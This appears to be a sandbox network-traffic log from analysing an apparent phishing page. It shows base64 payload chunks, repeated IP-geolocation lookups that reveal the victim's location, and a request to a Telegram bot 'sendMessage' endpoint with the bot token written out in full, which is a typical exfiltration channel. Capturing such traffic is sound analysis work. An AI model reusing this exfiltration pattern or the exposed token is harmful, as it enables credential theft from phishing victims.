2024-05-10 19:31:47 UTC	1369	IN	Data Raw: 5a 70 56 39 55 49 57 65 66 33 32 5a 5a 75 35 6f 41 74 61 31 6a 75 7a 65 62 63 31 33 50 44 36 32 78 4b 33 51 61 30 78 37 72 53 7a 59 51 70 47 42 4b 79 58 36 56 56 78 6a 44 73 74 65 2b 2b 37 76 53 71 41 54 4e 47 75 65 41 31 72 71 4f 5a 4f 71 65 72 36 57 68 61 58 79 63 7a 68 32 37 4f 42 66 32 62 33 58 4a 74 55 36 37 72 34 75 32 7a 36 76 76 67 59 2b 53 7a 58 59 39 6a 64 50 76 41 64 2b 33 6b 31 39 4b 45 4d 66 63 37 4b 78 68 44 54 4b 48 4c 47 5a 49 71 50 75 38 4d 55 39 56 37 5a 78 75 54 61 79 68 6e 56 30 4f 71 5a 62 72 59 39 31 31 7a 7a 6a 61 2b 33 70 2f 33 79 72 68 2b 43 33 50 4c 32 47 55 59 56 6f 58 31 36 44 79 61 33 5a 76 72 6a 33 50 4a 70 2f 44 64 79 65 63 6e 74 4c 68 71 37 34 54 50 35 2b 75 79 58 57 2f 6f 6d 72 32 4c 69 71 77 45 79 7a 77 46 76 4c 69 59 77 Data Ascii: ZpV9UIWef32ZZu5oAta1juzebc13PD62xK3Qa0x7rSzYQpGBKyX6VVxjDste++7vSqATNGueA1rqOZOqer6WhaXyczh27OBf2b3XJtU67r4u2z6vvgY+SzXY9jdPvAd+3k19KEMfc7KxhDTKHLGZIqPu8MU9V7ZxuTayhnV0OqZbrY911zzja+3p/3yrh+C3PL2GUYVoX16Dya3Zvrj3PJp/DdyecntLhq74TP5+uyXW/omr2LiqwEyzwFvLiYw
2024-05-10 19:31:47 UTC	1369	IN	Data Raw: 56 35 76 47 51 63 77 7a 30 63 69 73 31 33 79 4d 32 32 2b 2f 4c 2b 38 6b 39 6e 2f 2f 37 30 5a 2f 5a 78 49 75 37 54 62 61 46 61 58 6c 37 35 77 66 58 39 42 4b 46 54 4e 41 35 6f 49 75 73 7a 52 2b 43 77 4b 4d 51 74 55 4f 64 6d 2b 32 34 4e 64 38 4f 79 54 65 58 51 4a 2f 48 70 52 65 53 65 6c 42 41 55 68 50 34 57 46 37 57 42 49 51 31 51 7a 70 41 65 78 63 77 71 38 42 31 4e 32 6d 44 35 54 6a 44 38 47 47 67 4c 6a 46 50 64 5a 67 4b 59 41 54 4b 2b 64 4a 43 56 50 52 4f 4e 48 70 77 67 4c 67 4d 67 53 6b 4d 58 43 35 49 43 61 66 64 6e 2f 5a 5a 73 4e 4e 39 63 53 4f 4b 57 6c 64 34 69 6b 44 34 63 63 2f 4e 31 35 38 76 65 48 2f 6e 46 74 6a 45 58 68 42 75 37 36 74 46 66 30 64 33 37 66 70 71 67 6d 2f 43 49 63 5a 6a 46 39 77 41 43 59 62 72 77 36 57 4e 75 33 2b 63 77 6a 35 50 74 73 Data Ascii: V5vGQcwz0cis13yM22+/L+8k9n//70Z/ZxIu7TbaFaXl75wfX9BKFTNA5oIuszR+CwKMQtUOdm+24Nd8OyTeXQJ/HpReSelBAUhP4WF7WBIQ1QzpAexcwq8B1N2mD5TjD8GGgLjFPdZgKYATK+dJCVPRONHpwgLgMgSkMXC5ICafdn/ZZsNN9cSOKWld4ikD4cc/N158veH/nFtjEXhBu76tFf0d37fpqgm/CIcZjF9wACYbrw6WNu3+cwj5Pts
2024-05-10 19:31:47 UTC	1369	IN	Data Raw: 65 5a 77 44 4d 4f 37 39 35 48 64 65 4f 37 62 63 7a 73 6d 59 78 6b 41 63 36 63 4d 6a 52 2b 56 42 58 47 34 32 61 31 66 4f 64 72 50 68 66 6a 71 5a 59 66 37 74 36 49 51 61 76 67 2b 65 70 38 6f 57 53 30 4b 6b 31 57 56 57 77 7a 44 72 65 70 2b 6b 31 33 66 70 2f 47 7a 77 4d 74 77 6e 4d 36 43 57 63 61 43 37 66 62 44 48 33 79 2f 73 71 67 70 2f 2f 4e 6b 45 6d 2f 53 6a 59 58 56 4b 58 4c 31 61 63 51 34 48 36 36 2b 75 46 39 52 58 55 53 6d 45 41 68 31 59 61 32 6c 4f 63 32 71 42 65 55 39 68 6a 4d 77 79 54 2b 67 2f 75 75 36 56 73 44 64 4f 69 62 78 30 30 4c 4d 79 70 34 4e 78 34 6a 7a 59 48 71 6f 67 78 53 4d 43 37 54 65 69 58 34 41 78 65 61 45 6a 35 55 6c 43 64 6a 4f 48 62 2b 79 2f 39 69 33 6b 4f 4d 6b 32 74 64 7a 51 62 70 56 68 35 4f 46 58 43 77 6c 69 59 6d 49 7a 68 36 43 Data Ascii: eZwDMO795HdeO7bczsmYxkAc6cMjR+VBXG42a1fOdrPhfjqZYf7t6IQavg+ep8oWS0Kk1WVWwzDrep+k13fp/GzwMtwnM6CWcaC7fbDH3y/sqgp//NkEm/SjYXVKXL1acQ4H66+uF9RXUSmEAh1Ya2lOc2qBeU9hjMwyT+g/uu6VsDdOibx00LMyp4Nx4jzYHqogxSMC7TeiX4AxeaEj5UlCdjOHb+y/9i3kOMk2tdzQbpVh5OFXCwliYmIzh6C
2024-05-10 19:31:47 UTC	1369	IN	Data Raw: 5a 56 63 73 6b 74 52 6d 6b 74 56 78 38 34 47 50 69 71 44 79 65 5a 64 6b 54 35 75 54 4f 6e 6a 47 56 6d 72 34 78 47 75 66 37 45 30 6c 6a 37 76 35 32 4a 39 75 68 77 78 6c 69 53 62 6c 35 31 69 4d 58 6d 72 45 38 79 32 59 2f 6b 45 51 6a 4c 62 75 4b 6f 66 45 34 6a 4b 43 63 59 36 32 37 5a 78 4c 79 67 76 48 6f 38 6b 45 42 55 38 7a 36 73 31 66 36 36 58 50 73 64 71 74 76 55 78 68 62 44 4b 6f 32 46 2b 39 65 62 72 30 58 73 32 50 45 70 73 78 71 50 46 4a 74 50 45 4e 52 31 59 41 46 6f 56 6a 39 7a 53 38 59 74 56 33 54 50 41 4c 4a 31 78 77 41 45 32 51 31 4b 75 4a 43 2b 37 64 71 35 79 7a 51 52 36 50 41 46 44 78 35 6d 38 66 36 34 32 68 75 72 50 36 4c 38 41 61 77 6d 5a 46 66 35 69 68 45 34 47 63 6d 51 71 6f 53 77 2b 48 33 74 36 48 44 34 6e 6c 42 77 45 73 6d 6b 75 35 33 79 43 Data Ascii: ZVcsktRmktVx84GPiqDyeZdkT5uTOnjGVmr4xGuf7E0lj7v52J9uhwxliSbl51iMXmrE8y2Y/kEQjLbuKofE4jKCcY627ZxLygvHo8kEBU8z6s1f66XPsdqtvUxhbDKo2F+9ebr0Xs2PEpsxqPFJtPENR1YAFoVj9zS8YtV3TPALJ1xwAE2Q1KuJC+7dq5yzQR6PAFDx5m8f642hurP6L8AawmZFf5ihE4GcmQqoSw+H3t6HD4nlBwEsmku53yC
2024-05-10 19:31:47 UTC	1369	IN	Data Raw: 42 68 6a 42 56 77 66 6c 69 71 59 30 77 46 4c 2b 70 7a 68 31 34 77 44 71 75 4d 51 57 42 76 2b 65 51 32 47 66 63 69 51 2b 38 61 2f 49 43 41 6f 36 68 4d 6b 2f 73 5a 2f 52 36 38 4d 38 45 58 43 66 79 4a 59 42 38 4c 38 45 6f 35 41 6d 52 52 59 65 76 45 4c 70 58 42 78 64 64 44 48 36 44 72 35 4b 2f 4d 4d 64 66 75 73 79 76 73 49 4d 4d 2b 77 63 58 71 7a 5a 38 32 33 52 41 48 35 4a 4e 7a 75 4d 4c 31 54 54 59 32 6e 33 7a 4c 65 62 4f 71 32 2f 43 39 74 6b 50 38 33 2b 41 44 69 55 2f 31 47 6a 67 6a 6b 30 62 46 37 36 2f 63 44 2f 65 75 69 2f 74 2f 39 53 47 49 45 78 67 33 35 75 70 74 4d 76 45 48 65 6c 55 57 48 34 65 2b 4e 2b 65 77 2f 39 65 41 4b 65 68 58 55 79 68 32 67 37 64 54 74 68 6e 37 4c 79 31 67 42 68 4a 55 47 62 69 73 57 41 77 64 6f 4e 39 6a 33 43 53 4d 41 59 48 44 79 Data Ascii: BhjBVwfliqY0wFL+pzh14wDquMQWBv+eQ2GfciQ+8a/ICAo6hMk/sZ/R68M8EXCfyJYB8L8Eo5AmRRYevELpXBxddDH6Dr5K/MMdfusyvsIMM+wcXqzZ823RAH5JNzuML1TTY2n3zLebOq2/C9tkP83+ADiU/1Gjgjk0bF76/cD/eui/t/9SGIExg35uptMvEHelUWH4e+N+ew/9eAKehXUyh2g7dTthn7Ly1gBhJUGbisWAwdoN9j3CSMAYHDy
2024-05-10 19:31:47 UTC	1369	IN	Data Raw: 4f 6f 65 66 35 47 4c 76 57 6b 4b 64 4e 48 73 2b 7a 49 73 68 38 67 66 70 6b 31 43 6c 7a 69 44 2b 36 66 6a 4d 66 42 78 7a 4d 77 43 53 56 42 2f 61 79 78 78 75 73 79 61 41 65 57 4a 69 44 70 58 2b 5a 6e 62 63 51 4a 2f 71 70 61 75 51 34 4e 64 65 42 6d 4a 65 2b 6b 72 6d 50 76 73 61 54 59 32 51 65 41 31 59 7a 46 33 61 43 54 59 46 33 39 5a 67 50 2f 4b 48 6e 42 52 42 48 79 42 52 79 53 61 6a 4e 4b 4c 63 48 62 76 54 61 55 33 61 2f 53 38 77 72 7a 4f 6d 68 48 71 4c 59 50 37 6c 76 7a 66 42 4c 6a 4f 6b 55 69 31 68 2f 41 66 38 6e 56 32 53 65 54 48 55 45 39 62 56 59 6f 79 67 33 39 2f 6d 36 72 2f 41 2f 42 58 36 5a 2f 46 32 78 67 6a 6e 7a 32 66 31 64 78 33 54 2b 33 34 37 42 5a 53 66 41 42 76 37 72 6f 45 5a 75 46 65 49 6c 35 76 6f 4b 62 4b 51 43 34 79 6c 6e 74 53 33 6d 7a 38 Data Ascii: Ooef5GLvWkKdNHs+zIsh8gfpk1ClziD+6fjMfBxzMwCSVB/ayxxusyaAeWJiDpX+ZnbcQJ/qpauQ4NdeBmJe+krmPvsaTY2QeA1YzF3aCTYF39ZgP/KHnBRBHyBRySajNKLcHbvTaU3a/S8wrzOmhHqLYP7lvzfBLjOkUi1h/Af8nV2SeTHUE9bVYoyg39/m6r/A/BX6Z/F2xgjnz2f1dx3T+347BZSfABv7roEZuFeIl5voKbKQC4ylntS3mz8
2024-05-10 19:31:47 UTC	1369	IN	Data Raw: 41 2f 6b 38 2b 70 61 65 67 79 55 2b 78 37 69 61 65 59 44 6d 75 74 57 51 57 36 43 50 45 4e 67 65 7a 37 61 77 4c 6b 59 66 79 54 4d 4a 6a 42 38 6b 4f 58 64 6a 4c 55 44 37 41 71 39 37 6e 51 50 32 6c 4d 47 78 47 2f 6b 65 62 49 31 35 53 75 6f 54 7a 31 38 6f 46 36 46 50 43 48 35 48 2b 52 76 6e 74 4d 34 68 78 74 76 4d 4c 66 50 4d 52 77 72 59 77 68 77 37 7a 76 57 70 58 63 49 6e 4d 62 35 52 58 77 76 75 4c 63 42 51 67 65 2f 72 4e 67 59 75 56 4a 6e 4c 51 42 31 5a 73 5a 67 50 33 68 77 39 5a 6d 57 74 6d 35 79 78 58 70 32 50 5a 39 68 4b 42 58 36 54 52 2f 5a 38 57 7a 67 2f 70 6a 61 46 32 4a 35 36 7a 70 77 69 7a 31 32 6f 2f 30 33 4f 77 79 72 72 36 2f 44 4e 6c 58 6f 6b 6a 70 55 4e 48 45 6c 39 46 58 4a 4f 39 65 53 36 30 6d 32 4f 32 41 41 5a 30 4c 34 6f 4e 2b 70 78 67 79 33 Data Ascii: A/k8+paegyU+x7iaeYDmutWQW6CPENgez7awLkYfyTMJjB8kOXdjLUD7Aq97nQP2lMGxG/kebI15SuoTz18oF6FPCH5H+RvntM4hxtvMLfPMRwrYwhw7zvWpXcInMb5RXwvuLcBQge/rNgYuVJnLQB1ZsZgP3hw9ZmWtm5yxXp2PZ9hKBX6TR/Z8Wzg/pjaF2J56zpwiz12o/03Owyrr6/DNlXokjpUNHEl9FXJO9eS60m2O2AAZ0L4oN+pxgy3
2024-05-10 19:31:47 UTC	1369	IN	Data Raw: 2f 67 4a 76 55 78 69 6c 71 69 50 61 6c 58 34 30 76 58 69 52 4c 30 55 2f 34 4e 35 35 44 45 75 5a 71 6e 64 2f 44 66 69 58 33 6b 52 39 59 6a 42 74 59 6d 56 34 2f 79 33 6c 6f 66 4d 62 34 6e 33 78 4e 76 39 47 62 6f 66 31 76 45 50 78 68 51 58 62 76 30 54 63 46 4c 7a 57 56 36 78 78 48 6b 2f 64 62 2f 7a 76 47 73 69 39 6b 73 31 69 30 57 63 35 58 6d 2b 47 39 62 54 30 36 55 58 47 46 2b 4e 2b 33 64 32 2b 5a 51 39 74 68 68 6d 67 4d 57 53 6e 34 55 6e 74 35 36 4f 56 68 2b 63 79 5a 4c 4c 56 39 4e 7a 33 6a 77 56 49 33 4a 64 65 6c 58 4e 63 65 50 4d 33 72 78 48 38 2f 4b 74 77 6b 43 70 30 7a 79 71 6e 6b 59 4f 79 50 47 51 68 32 50 58 35 2b 61 78 4d 54 65 73 4f 61 30 75 78 2f 65 62 42 32 75 74 64 37 31 49 7a 32 66 75 31 30 66 35 63 4a 49 50 31 57 74 4e 62 63 6f 34 59 38 37 71 Data Ascii: /gJvUxilqiPalX40vXiRL0U/4N55DEuZqnd/DfiX3kR9YjBtYmV4/y3lofMb4n3xNv9Gbof1vEPxhQXbv0TcFLzWV6xxHk/db/zvGsi9ks1i0Wc5Xm+G9bT06UXGF+N+3d2+ZQ9thhmgMWSn4Unt56OVh+cyZLLV9Nz3jwVI3JdelXNcePM3rxH8/KtwkCp0zyqnkYOyPGQh2PX5+axMTesOa0ux/ebB2utd71Iz2fu10f5cJIP1WtNbco4Y87q
2024-05-10 19:31:47 UTC	1369	IN	Data Raw: 30 78 7a 6b 4e 39 33 65 53 4b 73 33 39 79 53 44 37 6e 35 4d 78 33 41 77 63 79 70 34 73 52 59 6a 33 77 6d 4b 33 6d 55 58 56 50 54 6f 76 52 4c 66 34 62 78 5a 65 74 71 2b 55 74 6e 48 72 79 4f 75 69 54 65 6a 56 58 77 36 45 4c 54 42 7a 48 30 4f 39 4f 37 5a 38 2f 37 37 58 79 4e 4e 2b 42 32 70 50 65 4d 50 64 30 63 58 2f 44 2b 56 4c 4e 72 38 58 79 63 56 34 78 31 37 2f 68 67 4e 6e 62 63 5a 71 6d 68 5a 64 4b 72 69 6e 69 53 30 37 6a 4b 75 78 79 37 68 56 2f 33 72 64 36 58 4f 51 49 38 37 57 7a 63 32 72 62 34 6c 4a 39 31 57 33 4e 41 35 64 5a 69 78 36 46 2f 2b 4c 36 65 4f 59 76 2b 70 4e 2b 50 6e 32 35 78 68 4d 7a 37 37 46 32 71 70 65 41 4d 65 53 50 31 32 72 59 44 46 33 2b 51 69 4d 61 34 69 5a 69 30 4c 55 51 63 79 7a 35 54 75 4c 49 4f 42 59 33 36 45 32 62 31 6f 46 42 48 Data Ascii: 0xzkN93eSKs39ySD7n5Mx3Awcyp4sRYj3wmK3mUXVPTovRLf4bxZetq+UtnHryOuiTejVXw6ELTBzH0O9O7Z8/77XyNN+B2pPeMPd0cX/D+VLNr8XycV4x17/hgNnbcZqmhZdKriniS07jKuxy7hV/3rd6XOQI87Wzc2rb4lJ91W3NA5dZix6F/+L6eOYv+pN+Pn25xhMz77F2qpeAMeSP12rYDF3+QiMa4iZi0LUQcyz5TuLIOBY36E2b1oFBH

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:48 UTC	493	OUT	GET / HTTP/1.1 Host: json.geoiplookup.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:48 UTC	814	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:48 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close vary: Accept-Encoding access-control-allow-origin: * x-ratelimit-limit: 10000 x-ratelimit-remaining: 9998 x-powered-by: Octolus x-content-type-options: nosniff x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RRLKjn9y5O32y2L9GnSgE%2FnzxQnNFxmQdSDIajZ%2BH77xvPbjYL5R%2BqnNeqBH0y%2F7nFHzwRMv9s%2FxO7j9375DZa%2B18luTS%2BCSU%2BRkbDs17ybG8BlWjxw8EK%2BtIbRECzR2r7oCHG%2BZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 881c5a03bc6f607d-ORD alt-svc: h3=":443"; ma=86400
2024-05-10 19:31:48 UTC	555	IN	Data Raw: 33 31 35 0d 0a 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 69 73 70 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 6c 61 74 69 74 75 64 Data Ascii: 315{ "ip": "81.181.62.34", "isp": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "org": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "hostname": "81.181.62.34", "latitud
2024-05-10 19:31:48 UTC	241	IN	Data Raw: 20 20 22 74 69 6d 65 7a 6f 6e 65 5f 6e 61 6d 65 22 3a 20 22 45 75 72 6f 70 65 5c 2f 42 75 63 68 61 72 65 73 74 22 2c 0a 20 20 20 20 22 63 6f 6e 6e 65 63 74 69 6f 6e 5f 74 79 70 65 22 3a 20 22 43 6f 72 70 6f 72 61 74 65 22 2c 0a 20 20 20 20 22 61 73 6e 5f 6e 75 6d 62 65 72 22 3a 20 30 2c 0a 20 20 20 20 22 61 73 6e 5f 6f 72 67 22 3a 20 22 22 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 63 6f 64 65 22 3a 20 22 52 4f 4e 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 52 6f 6d 61 6e 69 61 6e 20 4c 65 75 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 70 72 65 6d 69 75 6d 22 3a 20 66 61 6c 73 65 0a 7d 0d 0a Data Ascii: "timezone_name": "Europe\/Bucharest", "connection_type": "Corporate", "asn_number": 0, "asn_org": "", "asn": "", "currency_code": "RON", "currency_name": "Romanian Leu", "success": true, "premium": false}
2024-05-10 19:31:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:49 UTC	493	OUT	GET / HTTP/1.1 Host: json.geoiplookup.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:49 UTC	808	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:49 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close vary: Accept-Encoding access-control-allow-origin: * x-ratelimit-limit: 10000 x-ratelimit-remaining: 9997 x-powered-by: Octolus x-content-type-options: nosniff x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=22%2BQZTC4hLVUKFV%2BJoG7FyvGWRxffks4rw6m82wh42M9XuP%2BiKT97Ba9NuQg7Wpaxk3Da5AA%2FkR5WW4FEJ9K9kdt%2BphTO%2FUJB7TIa3jYDa2%2FH3Qlgy8o9rSJIcLY0JYMJo9gN9XG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 881c5a0b597f6181-ORD alt-svc: h3=":443"; ma=86400
2024-05-10 19:31:49 UTC	561	IN	Data Raw: 33 31 35 0d 0a 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 69 73 70 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 6c 61 74 69 74 75 64 Data Ascii: 315{ "ip": "81.181.62.34", "isp": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "org": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "hostname": "81.181.62.34", "latitud
2024-05-10 19:31:49 UTC	235	IN	Data Raw: 65 7a 6f 6e 65 5f 6e 61 6d 65 22 3a 20 22 45 75 72 6f 70 65 5c 2f 42 75 63 68 61 72 65 73 74 22 2c 0a 20 20 20 20 22 63 6f 6e 6e 65 63 74 69 6f 6e 5f 74 79 70 65 22 3a 20 22 43 6f 72 70 6f 72 61 74 65 22 2c 0a 20 20 20 20 22 61 73 6e 5f 6e 75 6d 62 65 72 22 3a 20 30 2c 0a 20 20 20 20 22 61 73 6e 5f 6f 72 67 22 3a 20 22 22 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 63 6f 64 65 22 3a 20 22 52 4f 4e 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 52 6f 6d 61 6e 69 61 6e 20 4c 65 75 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 70 72 65 6d 69 75 6d 22 3a 20 66 61 6c 73 65 0a 7d 0d 0a Data Ascii: ezone_name": "Europe\/Bucharest", "connection_type": "Corporate", "asn_number": 0, "asn_org": "", "asn": "", "currency_code": "RON", "currency_name": "Romanian Leu", "success": true, "premium": false}
2024-05-10 19:31:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:49 UTC	343	OUT	GET / HTTP/1.1 Host: json.geoiplookup.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:50 UTC	802	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:50 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close vary: Accept-Encoding access-control-allow-origin: * x-ratelimit-limit: 10000 x-ratelimit-remaining: 9996 x-powered-by: Octolus x-content-type-options: nosniff x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDtkxTmiYI94pwtigfNq0diKacnzekvmCD%2FcHLYWkKBKrzR%2Bajc212yB%2B5kzqKYiVDWBSB37aCcsX1ot4YhnJBc7h6cEWz5h5I66ObMpAAeYBUCjOvneR9NdLeSgJw%2FsOFsrMoXd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 881c5a0c4cac29ad-ORD alt-svc: h3=":443"; ma=86400
2024-05-10 19:31:50 UTC	567	IN	Data Raw: 33 31 35 0d 0a 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 69 73 70 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 6c 61 74 69 74 75 64 Data Ascii: 315{ "ip": "81.181.62.34", "isp": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "org": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "hostname": "81.181.62.34", "latitud
2024-05-10 19:31:50 UTC	229	IN	Data Raw: 6e 61 6d 65 22 3a 20 22 45 75 72 6f 70 65 5c 2f 42 75 63 68 61 72 65 73 74 22 2c 0a 20 20 20 20 22 63 6f 6e 6e 65 63 74 69 6f 6e 5f 74 79 70 65 22 3a 20 22 43 6f 72 70 6f 72 61 74 65 22 2c 0a 20 20 20 20 22 61 73 6e 5f 6e 75 6d 62 65 72 22 3a 20 30 2c 0a 20 20 20 20 22 61 73 6e 5f 6f 72 67 22 3a 20 22 22 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 63 6f 64 65 22 3a 20 22 52 4f 4e 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 52 6f 6d 61 6e 69 61 6e 20 4c 65 75 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 70 72 65 6d 69 75 6d 22 3a 20 66 61 6c 73 65 0a 7d 0d 0a Data Ascii: name": "Europe\/Bucharest", "connection_type": "Corporate", "asn_number": 0, "asn_org": "", "asn": "", "currency_code": "RON", "currency_name": "Romanian Leu", "success": true, "premium": false}
2024-05-10 19:31:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:50 UTC	508	OUT	OPTIONS /bot7198128499:AAHSvX4jW6n9t45ItKyUTcn3TOm2bCJdS-s/sendMessage HTTP/1.1 Host: api.telegram.org Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type Origin: null User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:50 UTC	345	IN	HTTP/1.1 204 No Content Server: nginx/1.18.0 Date: Fri, 10 May 2024 19:31:50 GMT Connection: close Access-Control-Max-Age: 86400 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Headers: content-type Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Timestamp	Bytes transferred	Direction	Data
